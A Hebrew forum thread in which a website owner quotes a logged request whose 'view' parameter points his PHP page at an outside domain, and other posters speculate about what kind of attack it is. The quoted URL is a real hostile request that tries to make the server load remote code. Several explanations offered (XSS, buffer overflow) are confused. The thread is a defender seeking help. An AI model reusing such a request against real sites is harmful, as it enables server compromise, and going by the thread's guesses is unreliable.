יש לי שאלה למבינים באבטחת מידע.

היסתכלתי בלוג של האתר שלי , וראיתי כמה גישות לאתר דרך IP שונים בגרמניה ובקנדה שמנסים להגיע לאתר הזה:

http://maalegilboa.org/hesite/index.php?view=http://calebsbirth.pisem.su/index.htm?

האתר שלי זה החלק הראשון - אני מבין שהם שולחים לו בקשה להציג את האתר השני... האם זה סוג של מתקפת XSS ?

אגב , מה שמקבלים זה דף של שגיאה 500 ... זה אומר שהאתר שלי חסם את זה אני משער...

זה בהחלט נראה כמו XSS, אבל זו התקפה שפשוט יחסית לעצור (לפחות הסוגים הפחות מתוחכמים שלה שלא דורשים למידה ממושכת של הרגלי השימוש באתר הנתקף), אז זה די מסתדר עם זה שהשרת שלך עצר את זה.

זה נחשב ל XSS או לPHP injection?

בדקתי את האתר התוקף דרך אופרה מיני בטלפון שלי (אני מפחד לבדוק אותו במחשב אישי בלי סביבת ווירטואליזציה לדפדפן)

יש שם כמה תמונות של תינוק , אישה , ואיך היא נראית אחרי ניתח קיסרי , ומתחת לזה כל מיני חתיכות קוד PHP מוזר עם כל מיני evalים .

נראה כאילו מישהו מנסה לעשות BufferOverflow לשרת PHP וליצור USER ADMIN חדש.

אני לא מבין גדול בPHP, אז אני לא יכול לומר לך בוודאות אם זה PHP injection, אבל בכל אופן השרת שלך עצר את זה, אז כנראה שזה לא הזרקת קוד (אם ההזרקת קוד עובדת אז היא עובדת נקודה, אחרת בנית את הקוד כמו שצריך וזהו וזה לא יעבוד).

הBuffer Overflow לא נשמע הגיוני, כי הInterpreter אמור לקרוס על דבר כזה או לפחות להריץ משהו מחדש במקום להמשיך לטחון שאילתות.

הזרקת הקוד כאן היא בכותרת - על ידי הוספת ?view= blablablab.com

הוא מנסה לבקש מהאתר להציג אתר אחר , באתר המוצג יש קוד זדוני והוא מנסה לפגוע בשרת שלי בזמן שהוא מציג את האתר.

אני לא בטוח באמת שמדובר בBO , אני לא ממש מכיר PHP טוב , אבל נראה לי שבגדול יש שם ניסיון לעקוף מנגנוני סינון או נסיון לאובסקיוריזציה של הקוד על ידי שימוש בכל מיני evalים למיניהם.

בכל מקרה , נראה לי מהודעת השגיאה - שהאתר שלי לא מסכים להציג דפים מחוץ לדומיין. אני לא הגדרתי את האפשרויות אבטחה של PHP , אבל זה כנראה עובד.